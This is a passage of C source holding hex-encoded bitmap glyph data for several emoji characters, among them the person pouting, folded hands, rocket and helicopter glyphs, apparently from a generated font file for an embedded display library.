0x0, 0x0, 0x0, 0x0, 0xe0, 0x38, 0xf, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x38, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38,
0x0, 0x38, 0x0, 0x0, 0x0, 0x0, 0xf, 0x80,
0x10, 0x0, 0x10, 0x1, 0xf0, 0x0, 0x0, 0x1f,
0xc0, 0x0, 0x0, 0x0, 0x3, 0xf8, 0x0, 0x0,
0x38, 0xe0, 0x0, 0x0, 0x0, 0x7, 0x1c, 0x0,
0x0, 0x78, 0xe0, 0x0, 0x0, 0x0, 0x7, 0x1e,
0x0, 0x3, 0xf8, 0xfc, 0x0, 0x0, 0x0, 0x3f,
0x1f, 0xc0, 0x7, 0xf8, 0xfe, 0x0, 0x0, 0x0,
0x7f, 0x1f, 0xe0, 0x7, 0x38, 0xe7, 0x0, 0x0,
0x0, 0xe7, 0x1c, 0xe0, 0x7, 0x38, 0xe7, 0x0,
0x0, 0x0, 0xe7, 0x1c, 0xe0, 0x3f, 0x38, 0xe7,
0x0, 0x0, 0x0, 0xe7, 0x1c, 0xfc, 0x7f, 0x38,
0xe7, 0x0, 0x0, 0x0, 0xe7, 0x1c, 0xfe, 0xe7,
0x38, 0xe7, 0x0, 0x0, 0x0, 0xe7, 0x1c, 0xe7,
0xc7, 0x38, 0xe7, 0x0, 0x0, 0x0, 0xe7, 0x1c,
0xe3, 0xc7, 0x38, 0xe7, 0x0, 0x0, 0x0, 0xe7,
0x1c, 0xe3, 0xc7, 0x38, 0xe7, 0x0, 0x0, 0x0,
0xe7, 0x1c, 0xe3, 0xc7, 0x38, 0xe7, 0x0, 0x0,
0x0, 0xe7, 0x1c, 0xe3, 0xc7, 0x38, 0xe7, 0x0,
0x0, 0x0, 0xe7, 0x1c, 0xe3, 0xc7, 0x38, 0xe7,
0x0, 0x0, 0x0, 0xe7, 0x1c, 0xe3, 0xc7, 0x38,
0xe7, 0x0, 0x0, 0x0, 0xe7, 0x1c, 0xe3, 0xc7,
0x38, 0xe7, 0x0, 0x0, 0x0, 0xe7, 0x1c, 0xe3,
0xc7, 0x39, 0xe7, 0x0, 0x0, 0x0, 0xe7, 0x9c,
0xe3, 0xc7, 0x3f, 0xe7, 0x0, 0x0, 0x0, 0xe7,
0xfc, 0xe3, 0xc7, 0xff, 0xe7, 0x0, 0x0, 0x0,
0xe7, 0xff, 0xe3, 0xc7, 0xf0, 0x7, 0x1f, 0x1,
0xf8, 0xe0, 0xf, 0xe3, 0xc7, 0x80, 0x7, 0x7f,
0x83, 0xfe, 0xe0, 0x1, 0xe3, 0xc2, 0x0, 0x7,
0xe1, 0xc7, 0x7, 0xe0, 0x0, 0x43, 0xc0, 0x0,
0xf, 0x81, 0xc7, 0x3, 0xf0, 0x0, 0x3, 0xc0,
0x0, 0x7f, 0x3, 0xc7, 0xc1, 0xfe, 0x0, 0x3,
0xc0, 0x1, 0xfe, 0xf, 0x83, 0xe0, 0xff, 0x80,
0x3, 0xc0, 0x3, 0xe0, 0x1f, 0x1, 0xf0, 0x7,
0xc0, 0x3, 0xc0, 0x7, 0x80, 0x3c, 0x0, 0x78,
0x1, 0xe0, 0x3, 0xc0, 0xf, 0x0, 0x38, 0x0,
0x38, 0x0, 0xf0, 0x3, 0xc0, 0xe, 0x0, 0x38,
0x0, 0x1c, 0x0, 0x70, 0x3, 0xc0, 0x1c, 0x0,
0x70, 0x0, 0x1c, 0x0, 0x38, 0x3, 0xc0, 0xc,
0x0, 0x70, 0x0, 0x1c, 0x0, 0x30, 0x3, 0xe0,
0x0, 0x0, 0x70, 0x0, 0xe, 0x0, 0x0, 0x6,
0x60, 0x0, 0x0, 0xe0, 0x0, 0xe, 0x0, 0x0,
0x6, 0x70, 0x0, 0x0, 0xe0, 0x0, 0x7, 0x0,
0x0, 0xe, 0x70, 0x0, 0x1, 0xc0, 0x0, 0x7,
0x80, 0x0, 0xe, 0x38, 0x0, 0x3, 0xc0, 0x0,
0x3, 0xc0, 0x0, 0x1c, 0x38, 0x0, 0x7, 0x80,
0x0, 0x1, 0xe0, 0x0, 0x1c, 0x1c, 0x0, 0xf,
0x0, 0x0, 0x0, 0xf0, 0x0, 0x38, 0x1c, 0x0,
0xe, 0x0, 0x0, 0x0, 0x70, 0x0, 0x38, 0x1c,
0x0, 0xc, 0x0, 0x0, 0x0, 0x30, 0x0, 0x38,
0x1c, 0x0, 0xc, 0x0, 0x0, 0x0, 0x30, 0x0,
0x38, 0x1c, 0x0, 0xc, 0x0, 0x0, 0x0, 0x30,
0x0, 0x38, 0x1c, 0x0, 0xc, 0x0, 0x0, 0x0,
0x30, 0x0, 0x38, 0x1c, 0x0, 0xc, 0x0, 0x0,
0x0, 0x30, 0x0, 0x38, 0x18, 0x0, 0xc, 0x0,
0x0, 0x0, 0x30, 0x0, 0x18, 0x18, 0x0, 0xc,
0x0, 0x0, 0x0, 0x30, 0x0, 0x18, 0x18, 0x0,
0xc, 0x0, 0x0, 0x0, 0x30, 0x0, 0x18, 0x18,
0x0, 0xc, 0x0, 0x0, 0x0, 0x30, 0x0, 0x18,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0,
/* U+1F64D "🙍" */
0x0, 0x0, 0x0, 0x7, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xff, 0xff, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf, 0xc0, 0xf, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x7,
0xc0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0,
0x7, 0x80, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0,
0x0, 0x7, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0,
0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0, 0xe,
0x0, 0x0, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x70, 0x0, 0x0,
0x0, 0xe, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x3, 0x80,
0x0, 0x0, 0x3, 0x80, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x38, 0x0, 0x0, 0x3, 0x80, 0x0, 0x0,
0x0, 0x0, 0x70, 0x0, 0x0, 0xe, 0x0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x0, 0x0, 0x70, 0x0,
0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0x3, 0x80,
0x40, 0x60, 0x18, 0x8, 0x7, 0x0, 0x0, 0xe,
0x3, 0xff, 0xc0, 0xff, 0xf0, 0x1c, 0x0, 0x0,
0x70, 0x3, 0xfc, 0x0, 0xff, 0x0, 0x38, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe, 0x0, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3c, 0x3, 0x80, 0x0, 0x0,
0x7f, 0x80, 0x0, 0x0, 0x70, 0x1c, 0x0, 0x0,
0xf, 0xff, 0xc0, 0x0, 0x0, 0xe0, 0xf0, 0x0,
0x0, 0xf8, 0x7, 0xc0, 0x0, 0x3, 0xc3, 0x80,
0x0, 0x3, 0x0, 0x7, 0x0, 0x0, 0x7, 0x1e,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1e,
0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x39, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xee, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0x70, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x39, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe3,
0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x7,
0xf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3c, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xe0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1e, 0x0, 0x3e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xf0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0x0, 0x0, 0x3f, 0xc0, 0x0,
0x0, 0x0, 0xf, 0xf0, 0x0, 0x0, 0x1f, 0xfe,
0x0, 0x0, 0x1f, 0xfe, 0x0, 0x0, 0x0, 0x7,
0xff, 0xff, 0xff, 0xff, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3f, 0xff, 0xff, 0x0, 0x0, 0x0,
/* U+1F64E "🙎" */
0x0, 0x0, 0x0, 0x1, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xff, 0xff, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xf0, 0x3,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0xf, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xc0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x1e, 0x0, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x1, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0x0, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x0, 0x0, 0x0, 0x7, 0x0,
0x0, 0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x3,
0x80, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x3c,
0x0, 0x0, 0x0, 0x38, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x1c, 0x0, 0x78, 0x0,
0x78, 0x0, 0xe0, 0x0, 0x0, 0xf, 0x0, 0x1e,
0x0, 0x1e, 0x0, 0x3c, 0x0, 0x0, 0x3, 0x80,
0xf, 0xc0, 0xf, 0xc0, 0x7, 0x0, 0x0, 0x1,
0xc0, 0x3, 0xf0, 0x3, 0xf0, 0x0, 0xe0, 0x0,
0x0, 0x70, 0x0, 0xfc, 0x0, 0xfc, 0x0, 0x38,
0x0, 0x0, 0x38, 0x0, 0x3f, 0x0, 0x3f, 0x0,
0x7, 0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xe0, 0x0, 0x7, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3c, 0x0, 0x3, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x1, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0,
0xf0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x3c,
0x0, 0x78, 0x0, 0x0, 0x1f, 0xfe, 0x0, 0x0,
0x7, 0x80, 0x1c, 0x0, 0x0, 0xf, 0x3, 0xc0,
0x0, 0x0, 0xe0, 0xe, 0x0, 0x0, 0x7, 0x0,
0x38, 0x0, 0x0, 0x1c, 0x7, 0x80, 0x0, 0x1,
0x80, 0x6, 0x0, 0x0, 0x7, 0x81, 0xc0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x38, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x1c, 0x0, 0x0, 0xfe, 0x0, 0x7, 0xf8,
0x0, 0x0, 0xe7, 0x0, 0x0, 0xff, 0xf0, 0xf,
0xff, 0x80, 0x0, 0x39, 0xc0, 0x0, 0x70, 0x3f,
0x1f, 0xc0, 0xf8, 0x0, 0xe, 0xe0, 0x0, 0x30,
0x1, 0xff, 0x80, 0x7, 0x0, 0x1, 0xf8, 0x0,
0x1c, 0x0, 0x1f, 0x80, 0x0, 0xc0, 0x0, 0x7e,
0x0, 0x6, 0x0, 0xf, 0x80, 0x0, 0x18, 0x0,
0x1f, 0x80, 0x1, 0x80, 0xf, 0x80, 0x0, 0x6,
0x0, 0x7, 0xe0, 0x0, 0x60, 0x3, 0x80, 0x0,
0x0, 0xc0, 0x1, 0xf8, 0x2, 0x18, 0x1, 0xc0,
0x1, 0xc0, 0x31, 0x0, 0x7e, 0x0, 0xff, 0x0,
0x70, 0x0, 0xff, 0xf, 0xc0, 0x1d, 0xc0, 0x3f,
0xc0, 0x38, 0x0, 0x73, 0xff, 0xf0, 0xe, 0x70,
0x3, 0xfc, 0x3c, 0x0, 0x38, 0x1f, 0xe0, 0x3,
0x9c, 0x0, 0x3, 0xfe, 0x0, 0x1c, 0x0, 0x0,
0x0, 0xe3, 0x80, 0x0, 0x7e, 0x0, 0xe, 0x0,
0x0, 0x0, 0x70, 0xf0, 0x0, 0x0, 0x0, 0x7,
0x0, 0x0, 0x0, 0x3c, 0x1c, 0x0, 0x0, 0x0,
0x7, 0x80, 0x0, 0x0, 0xe, 0x3, 0xc0, 0x0,
0x0, 0x7, 0x80, 0x0, 0x0, 0xf, 0x0, 0x78,
0x0, 0x0, 0x7, 0xf8, 0x0, 0x0, 0x7, 0x80,
0xf, 0x80, 0x0, 0x7, 0xdf, 0xc0, 0x0, 0x7,
0xc0, 0x0, 0xfc, 0x0, 0x3f, 0xc0, 0xff, 0x0,
0xf, 0xc0, 0x0, 0xf, 0xff, 0xff, 0x80, 0x7,
0xff, 0xff, 0xc0, 0x0, 0x0, 0x7f, 0xfc, 0x0,
0x0, 0xf, 0xff, 0x0, 0x0,
/* U+1F64F "🙏" */
0x0, 0x0, 0x0, 0x1e, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7f, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1, 0x8e, 0x30, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3, 0x1c, 0x60, 0x0, 0x0, 0x0,
0x0, 0x0, 0x6, 0x38, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x1f, 0xff, 0xc0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0xff, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x73, 0xe7, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0xc3, 0x86, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0x87, 0xc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x3, 0xe, 0x18, 0x0, 0x0, 0x0, 0x0,
0x0, 0x7, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1f, 0xff, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x38, 0xf8, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x60, 0xe0, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc1, 0xc1, 0x80, 0x0, 0x0, 0x0, 0x0,
0x1, 0x83, 0x83, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x7, 0x6, 0x0, 0x0, 0x0, 0x0, 0x0,
0x6, 0xe, 0xc, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x1c, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x38, 0x38, 0x38, 0x0, 0x0, 0x0, 0x0, 0x0,
0x60, 0x70, 0x30, 0x0, 0x0, 0x0, 0x0, 0x0,
0xc0, 0xe0, 0x60, 0x0, 0x0, 0x0, 0x0, 0x1,
0x81, 0xc0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x3,
0x3, 0x81, 0x80, 0x0, 0x0, 0x0, 0x0, 0xe,
0x7, 0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x18,
0xe, 0x3, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30,
0x1c, 0x6, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0,
0x38, 0xe, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0,
0x70, 0x1c, 0x0, 0x0, 0x0, 0x0, 0x3, 0x0,
0xe0, 0x18, 0x0, 0x0, 0x0, 0x0, 0x6, 0x1,
0xc0, 0x30, 0x0, 0x0, 0x0, 0x0, 0x1c, 0x3,
0x80, 0x70, 0x0, 0x0, 0x0, 0x0, 0x38, 0x7,
0x0, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x60, 0xe,
0x0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0xc0, 0x1c,
0x1, 0x80, 0x0, 0x0, 0x0, 0x1, 0x80, 0x38,
0x3, 0x0, 0x0, 0x0, 0x0, 0x77, 0x0, 0x70,
0x7, 0x70, 0x0, 0x0, 0x3, 0xfe, 0x0, 0xe0,
0xf, 0xf8, 0x0, 0x0, 0x1f, 0xf0, 0x1, 0xc0,
0x7, 0xfc, 0x0, 0x0, 0xff, 0xc0, 0x3, 0x80,
0x7, 0xfe, 0x0, 0x7, 0xe7, 0x0, 0x7, 0x0,
0x7, 0x3f, 0x0, 0x7e, 0xe, 0x0, 0xe, 0x0,
0xe, 0xf, 0xc3, 0xf0, 0xe, 0x0, 0x1c, 0x0,
0x38, 0x7, 0xe7, 0x80, 0x1c, 0x0, 0x38, 0x0,
0x70, 0x3, 0xcc, 0x0, 0x18, 0x0, 0x70, 0x0,
0xc0, 0x1, 0x80, 0x0, 0x38, 0x0, 0xe0, 0x3,
0x80, 0x0, 0x0, 0x0, 0x38, 0x7, 0xf0, 0xe,
0x0, 0x0, 0x0, 0x0, 0x70, 0x1f, 0xf0, 0x1c,
0x0, 0x0, 0x0, 0x0, 0x70, 0x7d, 0xf0, 0x70,
0x0, 0x0, 0x0, 0x0, 0x71, 0xc0, 0x71, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x77, 0x80, 0xf7, 0x80,
0x0, 0x0, 0x0, 0x0, 0xfe, 0x0, 0xfe, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x1, 0xf8, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x7, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xfc, 0x1f, 0x80, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf8, 0x3e, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0xf0, 0x78, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0xc0, 0x78, 0x0, 0x0,
0x0, 0x0, 0x0, 0x1e, 0x0, 0x3c, 0x0, 0x0,
0x0, 0x0, 0x0, 0x78, 0x0, 0x3c, 0x0, 0x0,
0x0, 0x0, 0x3, 0xe0, 0x0, 0x3e, 0x0, 0x0,
0x0, 0x0, 0x7, 0x0, 0x0, 0x1c, 0x0, 0x0,
0x0, 0x0, 0x4, 0x0, 0x0, 0x10, 0x0, 0x0,
/* U+1F680 "🚀" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x7, 0xc0, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x1, 0xe0, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x1, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x3e, 0x0, 0x3, 0x80,
0x0, 0x0, 0x0, 0x1, 0xfc, 0x0, 0x7, 0x0,
0x0, 0x0, 0x0, 0x7, 0x38, 0x0, 0xe, 0x0,
0x0, 0x0, 0x0, 0x3c, 0x30, 0x0, 0x3c, 0x0,
0x0, 0x0, 0x0, 0xe0, 0x70, 0x0, 0x70, 0x0,
0x0, 0x0, 0x3, 0x80, 0xe0, 0x0, 0xe0, 0x0,
0x0, 0x0, 0xe, 0x0, 0xe0, 0x3, 0xc0, 0x0,
0x0, 0x0, 0x38, 0x1, 0xc0, 0x7, 0x0, 0x0,
0x0, 0x0, 0xe0, 0x1, 0xc0, 0xe, 0x0, 0x0,
0x0, 0x7, 0x0, 0x3, 0xc0, 0x3c, 0x0, 0x0,
0x0, 0x1c, 0x0, 0x3, 0xc0, 0x70, 0x0, 0x0,
0x0, 0x30, 0x0, 0x3, 0xc1, 0xe0, 0x0, 0x0,
0x0, 0xc0, 0x0, 0x3, 0xe7, 0x80, 0x0, 0x0,
0x3, 0x0, 0x3e, 0x1, 0xfe, 0x0, 0x0, 0x0,
0xc, 0x0, 0xfe, 0x1, 0xfc, 0x0, 0x0, 0x0,
0x38, 0x3, 0xfe, 0x0, 0x70, 0x0, 0x0, 0x0,
0xe0, 0xf, 0xfe, 0x1, 0xe0, 0x0, 0x0, 0x3,
0x80, 0x1f, 0xfc, 0x7, 0x80, 0x0, 0x0, 0x6,
0x0, 0x3f, 0xf8, 0x1e, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x7f, 0xf0, 0x38, 0x0, 0x0, 0x1, 0xf8,
0x0, 0x7f, 0xc0, 0xf0, 0x0, 0x0, 0xff, 0xf8,
0x0, 0x7f, 0x3, 0xc0, 0x0, 0xf, 0xff, 0x30,
0x0, 0x7c, 0xf, 0x0, 0x0, 0x3f, 0x8e, 0x70,
0x0, 0x0, 0x1c, 0x0, 0x0, 0xe0, 0x18, 0xe0,
0x0, 0x0, 0x70, 0x0, 0x3, 0x80, 0x30, 0xe0,
0x0, 0x1, 0xe0, 0x0, 0xe, 0x0, 0xe0, 0xe0,
0x0, 0x7, 0x80, 0x0, 0x78, 0x1, 0x81, 0xc0,
0x0, 0x1e, 0x0, 0x1, 0xe0, 0xf, 0x1, 0xc0,
0x0, 0x78, 0x0, 0x7, 0x80, 0x3e, 0x1, 0xc0,
0x1, 0xe0, 0x0, 0xe, 0x1, 0xfc, 0x1, 0xe0,
0x7, 0x80, 0x0, 0x1f, 0xf, 0x98, 0x1, 0xe0,
0x1e, 0x0, 0x0, 0x1f, 0xfe, 0x70, 0x1, 0xf0,
0x78, 0x0, 0x0, 0xf, 0xf1, 0xf0, 0x0, 0xf9,
0xc0, 0x0, 0x0, 0x3, 0x87, 0xe0, 0x0, 0xff,
0x0, 0x0, 0x0, 0x0, 0xf, 0xe0, 0x0, 0x3c,
0x0, 0x0, 0x0, 0x0, 0x1f, 0xe0, 0x1, 0xf0,
0x0, 0x0, 0x0, 0x0, 0xff, 0xe0, 0x7, 0xe0,
0x0, 0x0, 0x0, 0x7, 0xff, 0xf0, 0x7f, 0x80,
0x0, 0x0, 0x0, 0x1e, 0x3f, 0xff, 0xf3, 0x0,
0x0, 0x0, 0x0, 0x70, 0x3f, 0xff, 0x86, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x3f, 0xdc, 0xc, 0x0,
0x0, 0x0, 0x3, 0x0, 0x3f, 0x38, 0x38, 0x0,
0x0, 0x0, 0xe, 0x0, 0x7c, 0xe0, 0x70, 0x0,
0x0, 0x0, 0x18, 0x1, 0xc1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x70, 0x3, 0x87, 0x1, 0x80, 0x0,
0x0, 0x0, 0xe0, 0xe, 0xe, 0x3, 0x0, 0x0,
0x0, 0x1, 0x84, 0x38, 0x18, 0x6, 0x0, 0x0,
0x0, 0x7, 0xf8, 0xf0, 0x70, 0x1c, 0x0, 0x0,
0x0, 0xf, 0xf7, 0xc0, 0xe0, 0x70, 0x0, 0x0,
0x0, 0x3f, 0xfe, 0x1, 0xc1, 0xe0, 0x0, 0x0,
0x0, 0x1, 0xf8, 0x1, 0xc7, 0x80, 0x0, 0x0,
0x0, 0x3, 0x80, 0x3, 0x8e, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x38, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xe, 0x0, 0x0, 0x0, 0x0,
0x0,
/* U+1F681 "🚁" */
0x0, 0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x3, 0xfc, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x3,
0xfc, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x0, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xfc, 0x0, 0x0, 0x0, 0x7, 0xfc, 0x71, 0xff,
0x80, 0x0, 0x0, 0x0, 0x0, 0x3, 0xfe, 0x7,
0x1, 0xff, 0x80, 0x0, 0x0, 0x0, 0x1, 0xff,
0x0, 0x70, 0x1, 0xff, 0x0, 0x0, 0x0, 0x0,
0x1f, 0x0, 0x7, 0x0, 0x1, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x80, 0x0, 0x70, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xff, 0xf8,
0x0, 0x0, 0x1f, 0xf0, 0x0, 0x0, 0xf, 0xff,
0xff, 0xc0, 0x0, 0x3, 0xfe, 0x0, 0x0, 0x0,
0xff, 0xff, 0xfc, 0x0, 0x0, 0x30, 0xe0, 0x0,
0x0, 0xf, 0xfe, 0x0, 0xc0, 0x0, 0x3, 0xe,
0x0, 0x0, 0x0, 0xff, 0xc0, 0xe, 0x0, 0x0,
0x70, 0xe0, 0x0, 0x0, 0xf, 0xf8, 0x0, 0xe0,
0x0, 0x6, 0x1c, 0x0, 0x0, 0x0, 0xff, 0x0,
0xe, 0x0, 0x0, 0xe1, 0xc0, 0x0, 0x0, 0xf,
0xf0, 0x0, 0xe0, 0x0, 0xe, 0x1c, 0x0, 0x0,
0x0, 0xff, 0xfe, 0xe, 0x0, 0x0, 0xc1, 0x80,
0x0, 0x0, 0xff, 0xff, 0xfe, 0xff, 0xff, 0xfc,
0x38, 0x0, 0x0, 0x7f, 0xc0, 0xf, 0xff, 0xff,
0xff, 0x83, 0x80, 0x0, 0x1f, 0xc0, 0x0, 0x3,
0xc0, 0x0, 0x0, 0x30, 0x0, 0x3, 0xf0, 0x0,
0x0, 0x8, 0x0, 0x0, 0x7, 0x0, 0x0, 0xff,
0x1f, 0xf, 0xc0, 0x0, 0x0, 0x0, 0x70, 0x0,
0x1f, 0xf1, 0xf1, 0xfe, 0x0, 0x0, 0x0, 0x6,
0x0, 0x3, 0xfe, 0x1e, 0x1f, 0xe0, 0x0, 0x0,
0x0, 0x60, 0x0, 0x7f, 0xe3, 0xe1, 0xfe, 0x0,
0x7, 0xff, 0x6, 0x0, 0xf, 0xfe, 0x3e, 0x1f,
0xe0, 0x0, 0xff, 0xf8, 0x60, 0x0, 0xff, 0xc3,
0xe1, 0xfe, 0x0, 0x1f, 0xff, 0x87, 0x0, 0x3f,
0xfc, 0x7e, 0x1f, 0xe0, 0x3, 0x80, 0x18, 0x70,
0x7, 0xff, 0xc7, 0xe1, 0xfe, 0x0, 0x70, 0x1,
0xc7, 0x0, 0x70, 0x0, 0x0, 0x0, 0x0, 0xe,
0x0, 0xc, 0x30, 0xe, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0xc3, 0x1, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x18, 0x0, 0xe, 0x38, 0x1c, 0x3,
0x0, 0x0, 0x0, 0x3, 0x80, 0x0, 0xe3, 0x81,
0xc0, 0x70, 0x0, 0x0, 0x0, 0x30, 0x0, 0x7,
0xf8, 0x1c, 0x7, 0x0, 0x0, 0x0, 0x7, 0x0,
0x0, 0x7f, 0x81, 0xc0, 0x70, 0x0, 0x0, 0x0,
0xe0, 0x0, 0x0, 0x0, 0xe, 0x6, 0x0, 0x0,
0x0, 0x1c, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x0,
